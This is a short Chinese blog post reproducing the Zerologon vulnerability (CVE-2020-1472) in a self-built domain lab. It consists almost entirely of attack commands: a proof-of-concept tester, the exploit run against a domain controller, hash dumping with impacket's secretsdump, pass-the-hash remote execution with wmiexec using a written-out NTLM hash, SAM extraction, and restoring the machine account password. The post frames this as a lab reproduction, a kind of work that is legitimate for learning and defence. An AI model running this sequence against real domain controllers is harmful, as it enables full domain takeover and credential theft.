0
点赞
收藏
分享

微信扫一扫

CVE-2020-1472 复现

Mhhao 2021-09-28 阅读 70
日记本


本地搭建一个域环境



使用poc验证

既然提示安装东西,那就   pip install -r requirements.txt  ,之后再执行     python3 zerologon_tester.py <主机名> <ip>


使用exp攻击,但是这个时候很多人的脚本回报错,是因为缺少 impacket,https://github.com/SecureAuthCorp/impacket  ,python3 setup.py install  //安装impacket,然后执行exp

python3 cve-2020-1472-exploit.py owa 192.168.137.137


使用impacket的secretsdump.py导出域控制上的hash

python3 secretsdump.py god.org/owa\$@192.168.137.137 -no-pass


利用获取到的管理员hash来远程操作域控服务器

python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:13cf6cfe1f2fc41cd286c7c8caec978b god.org/liukaifeng01@192.168.137.137




获取管理员hash,远程连接导出sam数据库中的原来的计算机hash


python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

恢复计算机的hash

下载脚本 https://github.com/risksense/zerologon

python3 reinstall_original_pw.py owa 192.168.137.137 ad611ebf4fd2de9448a33ba693b212f4     //注意hash的部分,只有后半部分


恢复计算机的hash

使用impacket的脚本来登录域控来验证hash

使用7步骤的脚本回复hash前


使用7步骤脚本恢复hash后



举报

相关推荐

0 条评论